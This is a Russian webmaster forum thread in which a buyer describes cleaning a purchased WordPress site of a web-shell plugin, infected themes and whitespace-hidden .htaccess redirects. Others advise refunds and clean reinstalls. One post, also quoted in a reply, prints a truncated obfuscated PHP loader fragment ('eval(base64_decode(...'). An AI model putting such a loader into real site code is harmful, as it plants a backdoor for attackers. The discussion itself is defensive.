Если продавец вам пихает сайт с шеллом?

12
V
На сайте с 20.12.2006
Offline
93
#11

в общем я продолжил анализ. Сайт на ВП, помимо плагина с шеллом обнаружил целый рассадник всего. Во первых в сайте было с пяток разных шаблонов причем каждый был с рассадой всякой дряни. Удалив все это и заменив на нормальный шаблон я обнаружил что проблемы не кончились. С мобильного меня редиректило хз куда, и я обнаружил целую кипу htaccess хитро замаскированных пробелами и редиректящих на самые разные сайты (в общей сложности их было более 30 штук по разным папкам). Далее я обнаружил в самых разных местах подозрительные куски (причем их было реально много)

<?php eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRl

и вот я все это почистив надеюсь что я ничего нигде не пропустил. И вроде сайт меня устраивает но после того как я целый день не разгибаясь чистил его и напильником обтачивал поражаясь тому как он весь завален шлаком, возникают резонные возмущения в адрес продавца который божится что он в продажах профи и за всю его долгую историю я первый и единственный с кем так получилось.

Вот как так?

--------------- Сайтеса (http://sitesa.ru) - первый антивирус для сайтов, скажите "нет" взлому!
KI
На сайте с 31.07.2008
Offline
90
#12
Vann:
в общем я продолжил анализ. Сайт на ВП, помимо плагина с шеллом обнаружил целый рассадник всего. Во первых в сайте было с пяток разных шаблонов причем каждый был с рассадой всякой дряни. Удалив все это и заменив на нормальный шаблон я обнаружил что проблемы не кончились. С мобильного меня редиректило хз куда, и я обнаружил целую кипу htaccess хитро замаскированных пробелами и редиректящих на самые разные сайты (в общей сложности их было более 30 штук по разным папкам). Далее я обнаружил в самых разных местах подозрительные куски (причем их было реально много)
<?php eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRl
и вот я все это почистив надеюсь что я ничего нигде не пропустил. И вроде сайт меня устраивает но после того как я целый день не разгибаясь чистил его и напильником обтачивал поражаясь тому как он весь завален шлаком, возникают резонные возмущения в адрес продавца который божится что он в продажах профи и за всю его долгую историю я первый и единственный с кем так получилось.

Вот как так?

да это все тут на каждом шагу встречается, а если у человека сайтов от 30-50 и более сателитов там и тд и тп - то кто проверяет то их ? да и некоторые вообще шаблоны не чистят и с ними заразу на сайт заносят - бывает и такое не зря же некоторые продвигаются ссылками из шаблонов и люди ведь их не убирают некоторые вообще (там же в шаблон бывают встроены куски кода лишние файлы и тд)

перевод ру<=> eng (/ru/forum/826373) - технические тексты, художественные рассказы и тд (стараюсь не браться за юр. документы, справки)
V
На сайте с 20.12.2006
Offline
93
#13
Kater-INA:
да это все тут на каждом шагу встречается, а если у человека сайтов от 30-50 и более сателитов там и тд и тп - то кто проверяет то их ? да и некоторые вообще шаблоны не чистят и с ними заразу на сайт заносят - бывает и такое не зря же некоторые продвигаются ссылками из шаблонов и люди ведь их не убирают некоторые вообще (там же в шаблон бывают встроены куски кода лишние файлы и тд)

фигасебе у вас подход ))) я себя прямо начал ощущать неправильным каким то )) такое ощущение что я прийдя на дискотеку поймал триппер а мне говорят "да ты че братуха, тут абсолютно все такие, это нормально, расслабься!" :DDD

Cows Lab
На сайте с 17.01.2012
Offline
23
#14
резонные возмущения в адрес продавца который божится что он в продажах профи и за всю его долгую историю я первый и единственный с кем так получилось.

возможно разумно попросить с продавца N-ую сумму денег назад, хотя бы за потраченное вами время на подчистку. Строго ИМХО )

удаленный контроль смартфона здесь (http://talklog.net)
WebGomel
На сайте с 29.10.2011
Offline
78
#15
Cows Lab:
возможно разумно попросить с продавца N-ую сумму денег назад, хотя бы за потраченное вами время на подчистку. Строго ИМХО )

Вполне разумно.

Раз товар ненадлежащего качества, скидка очень даже уместна.

Удалённый системный администратор ( https://remadmin.com )
V
На сайте с 20.12.2006
Offline
93
#16

Спасибо за советы

K
На сайте с 12.05.2012
Offline
0
#17

Ну вообще это конечно некомпетентность продавца, но это нынче не редкость и при покупке сайта советую просто всё сперва задампить, потом снести всё к чёрту, поставить старый двиг и накатить старую бд. Таким образом, можно обезопасить себя. Диз можно просто просканить авшниками, но я бы вам посоветовал протестировать на локи различных ав и поисковиков. Такой сайт могут запросто заблочить из-за плохого отношения к посетителям.

R
На сайте с 24.01.2008
Offline
180
#18

Перед покупкой сайтов всех своих клиентов мы предупреждаем о необходимости проверять все сайты на наличие шеллов и вирусов, т.к. заливая на свой хост можно занести заразу на все сайты, а если их например 50, то будет проблематично чистить их от всго лишнего.

Удаление вирусов с сайта, защита сайта, Гарантия! ( /ru/forum/999073 ) -> топик на маулталк ( http://www.maultalk.com/topic113834s0.html ) -> Топик в сапе ( http://forum.sape.ru/showthread.php?t=79363 ). TELEGRAM - https://t.me/Doktorsaitov
12

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий